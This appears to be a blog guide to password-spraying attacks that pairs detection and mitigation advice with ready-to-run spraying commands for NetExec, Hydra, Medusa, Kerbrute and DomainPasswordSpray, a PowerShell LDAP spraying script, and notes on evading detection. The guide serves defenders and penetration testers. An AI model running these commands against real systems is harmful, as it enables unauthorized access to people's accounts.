A Comprehensive Guide to Password Spraying Attacks
Introduction
Password spraying is a type of brute-force attack where a malicious actor attempts to gain unauthorized access to a large number of accounts with a few commonly used passwords. Unlike traditional brute-force attacks that target a single account with many passwords, password spraying uses a "low-and-slow" approach to avoid account lockouts and detection mechanisms. This technique has become increasingly popular among threat actors and remains one of the most effective methods for gaining initial access to organizational networks.
According to MITRE ATT&CK, password spraying is classified as technique T1110.003 under the Credential Access tactic. This guide provides a comprehensive overview of password spraying attacks, including the techniques, tools, and mitigation strategies for both Linux and Windows environments.
Password Spraying vs. Related Attack Methods
It is important to understand how password spraying differs from other credential-based attacks:
| Attack Type | Description | Detection Difficulty |
|---|---|---|
| Password Spraying | One or a few passwords are tried against many different accounts | Medium to High |
| Credential Stuffing | Stolen username/password pairs from one data breach are used against other services | Medium |
| Brute Force (Traditional) | Many different passwords are tried against a single account | Low (easily detected by account lockout) |
| Dictionary Attack | Passwords from a predefined list are tried against accounts | Low to Medium |
Commonly Targeted Protocols and Services
Password spraying attacks can be performed against a variety of protocols and services. Organizations must understand which services are most at risk in their environments. The following table lists the most common targets:
| Protocol/Service | Port | Environment | Risk Level |
|---|---|---|---|
| SSH | 22/TCP | Linux/Unix | High |
| SMB | 445/TCP | Windows | Critical |
| RDP (Remote Desktop Protocol) | 3389/TCP | Windows | Critical |
| LDAP | 389/TCP | Windows (Active Directory) | High |
| Kerberos | 88/TCP | Windows (Active Directory) | High |
| FTP | 21/TCP | Cross-platform | Medium |
| Telnet | 23/TCP | Cross-platform | Medium |
| HTTP/HTTPS | 80/TCP, 443/TCP | Cross-platform | Medium |
| Microsoft SQL Server | 1433/TCP | Windows | High |
| Oracle Database | 1521/TCP | Cross-platform | High |
| MySQL | 3306/TCP | Cross-platform | Medium |
| VNC | 5900/TCP | Cross-platform | Medium |
Password Spraying Tools
Several tools are commonly used by security professionals and threat actors to perform password spraying attacks. Understanding these tools is essential for both attackers and defenders. The following table provides an overview of the most popular tools:
| Tool Name | Supported Protocols | Platform | Key Features |
|---|---|---|---|
| NetExec (nxc) | SMB, SSH, FTP, RDP, LDAP, WMI, MSSQL | Linux/Windows | Multithreaded, supports multiple protocols, active development |
| Hydra | SSH, FTP, Telnet, HTTP, LDAP, SMB, and many others | Linux/Windows/macOS | Fast, flexible, supports 50+ protocols, widely used |
| Medusa | SSH, FTP, Telnet, HTTP, LDAP, SMB, and others | Linux/Windows | Massively parallel, modular, flexible user input |
| Kerbrute | Kerberos (Active Directory) | Linux/Windows | User enumeration, password spraying, AS-REP hash capture |
| DomainPasswordSpray | Active Directory (SMB) | Windows | PowerShell-based, automatic user enumeration, domain-aware |
| Spray-AD | Active Directory (Kerberos) | Windows (Cobalt Strike) | Cobalt Strike integration, safe mode, customizable |
Practical Examples: Password Spraying in Action
Linux Environment Examples
SSH Password Spraying with NetExec (nxc)
NetExec is a modern replacement for CrackMapExec and provides a powerful way to perform password spraying against SSH services:
# Basic SSH password spray against a subnet
nxc ssh 192.168.1.0/24 -u usernames.txt -p 'Password123' --continue-on-success
# Spray multiple passwords
nxc ssh 192.168.1.100 -u admin -p 'Password123 Welcome1 Summer2025'
# Spray with verbose output
nxc ssh 192.168.1.0/24 -u users.txt -p 'Password123' -vSSH Password Spraying with Hydra
Hydra is one of the most popular and widely-used password spraying tools. It supports numerous protocols and offers excellent flexibility:
# Basic SSH password spray
hydra -L usernames.txt -p 'Password123' ssh://192.168.1.100
# SSH spray with multiple passwords
hydra -L usernames.txt -P passwords.txt ssh://192.168.1.100 -t 4
# SSH spray with custom port
hydra -L usernames.txt -p 'Password123' ssh://192.168.1.100:2222
# FTP password spray
hydra -L usernames.txt -p 'Password123' ftp://192.168.1.100
# Telnet password spray
hydra -L usernames.txt -p 'Password123' telnet://192.168.1.100Medusa for Multi-Protocol Spraying
Medusa offers a massively parallel approach to password spraying:
# SSH password spray with Medusa
medusa -h 192.168.1.100 -u admin -p 'Password123' -M ssh
# Multiple hosts and users
medusa -H hosts.txt -U users.txt -p 'Password123' -M ssh -t 10
# FTP password spray
medusa -h 192.168.1.100 -u admin -p 'Password123' -M ftpWindows Environment Examples
SMB Password Spraying with NetExec (nxc)
NetExec is highly effective for SMB-based password spraying in Windows environments:
# Basic SMB password spray
nxc smb 10.10.10.0/24 -u usernames.txt -p 'Summer2025' --continue-on-success
# Spray against a single host with multiple passwords
nxc smb 10.10.10.50 -u admin -p 'Password1 Password2 Summer2025'
# Check username == password
nxc smb 10.10.10.50 -u users.txt -p users.txt --no-bruteforce --continue-on-success
# Spray with verbose output
nxc smb 10.10.10.0/24 -u users.txt -p 'Welcome1' -vKerberos Password Spraying with Kerbrute
Kerbrute is specifically designed for Kerberos-based attacks and is excellent for Active Directory environments. It offers the advantage of not triggering as many security events as SMB-based attacks:
# User enumeration (no lockout risk)
./kerbrute userenum --dc 10.10.10.1 -d active.local users.txt
# Password spray with Kerbrute
./kerbrute passwordspray --dc 10.10.10.1 -d active.local valid_users.txt 'Welcome1!'
# Brute force a single user
./kerbrute bruteuser --dc 10.10.10.1 -d active.local passwords.txt admin
# Safe mode (stops if account lockout detected)
./kerbrute passwordspray --dc 10.10.10.1 -d active.local users.txt 'Password123' --safeActive Directory Password Spraying with DomainPasswordSpray.ps1
DomainPasswordSpray is a PowerShell-based tool that is particularly effective for Active Directory environments:
# Basic password spray
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password 'Winter2025' -Domain active.local
# Spray with custom delay between attempts
Invoke-DomainPasswordSpray -Password 'Summer2025' -Domain active.local -Delay 500
# Spray and continue after finding valid credentials
Invoke-DomainPasswordSpray -Password 'Password123' -Domain active.local -ForceLDAP Password Spraying
LDAP-based password spraying is particularly stealthy because it generates fewer security events than SMB-based attacks. Here is an example using PowerShell:
# LDAP password spray using PowerShell
$domain = "active.local"
$password = "Password123"
$users = @("user1", "user2", "user3")
foreach ($user in $users) {
$ldap = New-Object System.DirectoryServices.Protocols.LdapConnection("$domain:389")
$credential = New-Object System.Net.NetworkCredential($user, $password, $domain)
$ldap.Credential = $credential
try {
$ldap.Bind()
Write-Host "[+] Valid credentials: $user : $password"
} catch {
Write-Host "[-] Failed: $user"
}
}Detection and Monitoring
Key Indicators of Password Spraying Attacks
Organizations should monitor for the following indicators that suggest a password spraying attack is in progress:
- A high number of failed login attempts from a single IP address across multiple accounts
- Failed login attempts from multiple IP addresses targeting the same set of accounts
- Unusual patterns in authentication logs (e.g., attempts at specific intervals)
- Successful login followed by immediate logout or inactivity
- Attempts targeting service accounts or default usernames
Windows Event IDs to Monitor
The following Windows Event IDs are particularly important for detecting password spraying attacks:
| Event ID | Description | Attack Method |
|---|---|---|
| 4625 | An account failed to log on | SMB-based attacks |
| 4771 | Kerberos pre-authentication failed | Kerberos-based attacks |
| 4768 | A Kerberos authentication ticket (TGT) was requested | User enumeration, Kerberos attacks |
| 4776 | The computer attempted to validate the credentials for an account | NTLM-based attacks |
SIEM Configuration for Detection
A Security Information and Event Management (SIEM) solution should be configured to alert on the following conditions:
- More than 5 failed login attempts from a single IP address in a 10-minute window
- Failed login attempts against 10 or more different user accounts from a single IP address
- Multiple failed Kerberos pre-authentication attempts (Event ID 4771) from a single IP address
- Successful login from an IP address that previously had multiple failed attempts
Mitigation and Defense Strategies
Technical Controls
Multi-Factor Authentication (MFA)
Multi-Factor Authentication is one of the most effective defenses against password spraying attacks. Even if an attacker obtains valid credentials, they cannot gain access without the second factor. Organizations should prioritize implementing MFA for:
- Remote access services (VPN, RDP, SSH)
- Administrative accounts
- Email and collaboration platforms
- Cloud services and SaaS applications
Account Lockout Policies
Account lockout policies can help prevent password spraying, but attackers will typically stay below the lockout threshold. Recommended settings:
- Lock account after 5-10 failed login attempts
- Lockout duration of 15-30 minutes
- Reset failed login counter after 15-30 minutes of inactivity
Password Policy
A strong password policy makes password spraying attacks less effective:
- Minimum password length of 12-14 characters
- Require complexity (uppercase, lowercase, numbers, special characters)
- Implement a password history to prevent reuse
- Use a password filter to prevent common passwords
Network Segmentation
Limit access to sensitive services by implementing network segmentation:
- Restrict SSH access to specific IP ranges
- Use VPN or bastion hosts for remote access
- Implement firewall rules to limit access to management services
Service Hardening
Disable or restrict access to unnecessary services:
- Disable or restrict SSH access when not needed
- Use non-standard ports for management services
- Implement IP whitelisting for administrative access
- Use certificate-based authentication instead of passwords where possible
Operational Controls
Monitoring and Alerting
Implement comprehensive logging and alerting for authentication events. Ensure that SIEM systems are configured to detect and alert on suspicious patterns.
Incident Response
Develop and maintain an incident response plan for password spraying attacks. This should include:
- Procedures for identifying and containing the attack
- Steps for investigating the scope of the compromise
- Communication protocols for notifying affected users and stakeholders
- Recovery procedures and post-incident analysis
User Education
User education is a critical component of any security program. Users should be trained on:
- The importance of strong, unique passwords
- The risks of password reuse across multiple systems
- How to recognize and report suspicious activity
- The proper use of Multi-Factor Authentication
Advanced Evasion Techniques
Throttling and Timing
Attackers often throttle their password spraying attempts to avoid triggering security alerts. By spacing out attempts over hours or days, attackers can stay below detection thresholds. This is why monitoring for subtle patterns is important.
LDAP and Kerberos-Based Attacks
LDAP and Kerberos-based password spraying attacks generate fewer security events than SMB-based attacks. This makes them more difficult to detect, which is why organizations should specifically monitor for these attack vectors.
Distributed Attacks
Attackers may distribute their password spraying attempts across multiple IP addresses to avoid IP-based detection. This requires more sophisticated detection mechanisms that focus on account-level patterns rather than IP-level patterns.
Conclusion
Password spraying remains a popular and effective attack vector for malicious actors seeking initial access to organizational networks. By understanding the techniques and tools used in these attacks, and by implementing a defense-in-depth security strategy, organizations can significantly reduce their risk of compromise.
The key to defending against password spraying attacks is a combination of strong technical controls (particularly Multi-Factor Authentication), vigilant monitoring and alerting, regular security assessments, and ongoing user education. Organizations should also maintain an up-to-date inventory of all systems and services that are exposed to the internet, and ensure that these systems are properly hardened and monitored.
As threat actors continue to evolve their tactics, organizations must remain vigilant and continuously improve their security posture. Regular penetration testing and red team exercises can help identify weaknesses in defenses before they are exploited by real attackers.
Comments
Post a Comment